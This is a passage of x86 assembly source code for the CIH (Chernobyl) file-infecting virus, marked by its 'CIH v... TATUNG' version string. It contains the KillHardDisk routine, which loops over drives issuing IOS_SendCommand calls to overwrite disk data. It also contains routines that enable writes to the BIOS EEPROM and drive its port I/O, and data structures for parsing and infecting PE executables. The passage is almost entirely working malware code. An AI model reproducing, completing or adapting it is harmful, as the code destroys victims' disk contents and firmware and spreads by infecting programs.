- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
- ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
- ; ***************************************************
- KillHardDisk:
- xor ebx, ebx
- mov bh, FirstKillHardDiskNumber
- push ebx
- sub esp, 2ch
- push 0c0001000h
- mov bh, 08h
- push ebx
- push ecx
- push ecx
- push ecx
- push 40000501h
- inc ecx
- push ecx
- push ecx
- mov esi, esp
- sub esp, 0ach
- LoopOfKillHardDisk:
- int 20h
- dd 00100004h ; VXDCall IOS_SendCommand
- cmp word ptr [esi+06h], 0017h
- je KillNextDataSection
- ChangeNextHardDisk:
- inc byte ptr [esi+4dh]
- jmp LoopOfKillHardDisk
- KillNextDataSection:
- add dword ptr [esi+10h], ebx
- mov byte ptr [esi+4dh], FirstKillHardDiskNumber
- jmp LoopOfKillHardDisk
- ; ***************************
- ; * Enable EEPROM to Write *
- ; ***************************
- EnableEEPROMToWrite:
- mov [eax], cl
- mov [ecx], al
- mov byte ptr [eax], 80h
- mov [eax], cl
- mov [ecx], al
- ret
- ; ***************************
- ; * IO for EEPROM *
- ; ***************************
- IOForEEPROM:
- @10 = IOForEEPROM
- xchg eax, edi
- xchg edx, ebp
- out dx, eax
- xchg eax, edi
- xchg edx, ebp
- in al, dx
- BooleanCalculateCode = $
- or al, 44h
- xchg eax, edi
- xchg edx, ebp
- out dx, eax
- xchg eax, edi
- xchg edx, ebp
- out dx, al
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- LastVxDCallAddress = IFSMgr_Ring0_FileIO
- VxDCallAddressTable db 00h
- db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
- db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
- db IFSMgr_Ring0_FileIO-UniToBCSPath
- VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
- VxDCallTableSize = ($-VxDCallIDTable)/04h
- ; *********************************************************
- ; * Virus Version Copyright *
- ; *********************************************************
- VirusVersionCopyright db 'CIH v'
- db MajorVirusVersion+'0'
- db '.'
- db MinorVirusVersion+'0'
- db ' TATUNG'
- ; *********************************************************
- ; * Virus Size *
- ; *********************************************************
- VirusSize = $
- ; + SizeOfVirusCodeSectionTableEndMark(04h)
- ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
- ; + SizeOfTheFirstVirusCodeSectionTable(04h)
- ; *********************************************************
- ; * Dynamic Data *
- ; *********************************************************
- VirusGameDataStartAddress = VirusSize
- @6 = VirusGameDataStartAddress
- OnBusy db 0
- FileModificationTime dd ?
- FileNameBuffer db FileNameBufferSize dup(?)
- @7 = FileNameBuffer
- DataBuffer = $
- @8 = DataBuffer
- NumberOfSections dw ?
- TimeDateStamp dd ?
- SymbolsPointer dd ?
- NumberOfSymbols dd ?
- SizeOfOptionalHeader dw ?
- _Characteristics dw ?
- Magic dw ?
- LinkerVersion dw ?
- SizeOfCode dd ?
- SizeOfInitializedData dd ?
- SizeOfUninitializedData dd ?
- AddressOfEntryPoint dd ?
- BaseOfCode dd ?
- BaseOfData dd ?
- ImageBase dd ?
- @9 = $
- SectionAlignment dd ?
- FileAlignment dd ?
- OperatingSystemVersion dd ?
- ImageVersion dd ?
- SubsystemVersion dd ?
- Reserved dd ?
- SizeOfImage dd ?
- SizeOfHeaders dd ?
- SizeOfImageHeaderToRead = $-NumberOfSections
- NewAddressOfEntryPoint = DataBuffer ; DWORD
- SizeOfImageHeaderToWrite = 04h
- StartOfSectionTable = @9
- SectionName = StartOfSectionTable ; QWORD
- VirtualSize = StartOfSectionTable+08h ; DWORD
- VirtualAddress = StartOfSectionTable+0ch ; DWORD
- SizeOfRawData = StartOfSectionTable+10h ; DWORD
- PointerToRawData = StartOfSectionTable+14h ; DWORD
- PointerToRelocations = StartOfSectionTable+18h ; DWORD
- PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
- NumberOfRelocations = StartOfSectionTable+20h ; WORD
- NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
- Characteristics = StartOfSectionTable+24h ; DWORD
- SizeOfScetionTable = Characteristics+04h-SectionName
- ; *********************************************************
- ; * Virus Total Need Memory *
- ; *********************************************************
- VirusNeedBaseMemory = $
- VirusTotalNeedMemory = @9
- ; + NumberOfSections(??)*SizeOfScetionTable(28h)
- ; + SizeOfVirusCodeSectionTableEndMark(04h)
- ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
- ; + SizeOfTheFirstVirusCodeSectionTable(04h)
- ; *********************************************************
- ; *********************************************************
- VirusGame ENDS
- END FileHeader